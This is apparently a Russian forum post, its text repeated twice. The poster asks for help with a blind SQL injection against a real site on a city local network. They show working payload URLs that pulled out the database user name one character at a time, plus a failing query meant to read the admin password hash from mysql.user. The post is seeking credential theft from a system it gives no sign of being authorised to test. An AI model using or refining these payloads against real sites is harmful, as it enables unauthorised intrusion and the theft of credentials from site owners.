Есть сайт.
В нем есть ссылки имеют вид: http://www.xxx.xxx/index.php?part=bulletenread&id=26
id-имеет тип int.
http://www.xxx.xxx/index.php?part=bulletenread&id=25 - ведет к ошибке
http://www.xxx.xxx/index.php?part=bulletenread&id=25+1 -работает...
Я нашел имя (admin) под которым работает сайт таким способом:
http://www.xxx.xxx/index.php?part=bulletenread&id=26 AND ascii(lower(substring(user(),1,1)))>XXX - где ХХХ число, подбирая которое, я подобрал первую букву имени, и так далее меняя substring(user(),1,1) на substring(user(),2,1) и т.д.
Но сделать более сложный запрос я не могу... например:
http://www.xxx.xxx/index.php?part=bulletenread&id=26 AND ascii(lower(substring((SELECT password from mysql.user WHERE user='admin' LIMIT 1),1,1)))>48 выдаёт мне:
Неудачно выполнен запрос: You have an error in your SQL syntax near 'SELECT password from mysql.user WHERE user=\'admin\' LIMIT 1),1,1)))>48' at line 1
как быть ?
PS: САЙТ в городской локалке. Ссылку давать нет смысла
В нем есть ссылки имеют вид: http://www.xxx.xxx/index.php?part=bulletenread&id=26
id-имеет тип int.
http://www.xxx.xxx/index.php?part=bulletenread&id=25 - ведет к ошибке
http://www.xxx.xxx/index.php?part=bulletenread&id=25+1 -работает...
Я нашел имя (admin) под которым работает сайт таким способом:
http://www.xxx.xxx/index.php?part=bulletenread&id=26 AND ascii(lower(substring(user(),1,1)))>XXX - где ХХХ число, подбирая которое, я подобрал первую букву имени, и так далее меняя substring(user(),1,1) на substring(user(),2,1) и т.д.
Но сделать более сложный запрос я не могу... например:
http://www.xxx.xxx/index.php?part=bulletenread&id=26 AND ascii(lower(substring((SELECT password from mysql.user WHERE user='admin' LIMIT 1),1,1)))>48 выдаёт мне:
Неудачно выполнен запрос: You have an error in your SQL syntax near 'SELECT password from mysql.user WHERE user=\'admin\' LIMIT 1),1,1)))>48' at line 1
как быть ?
PS: САЙТ в городской локалке. Ссылку давать нет смысла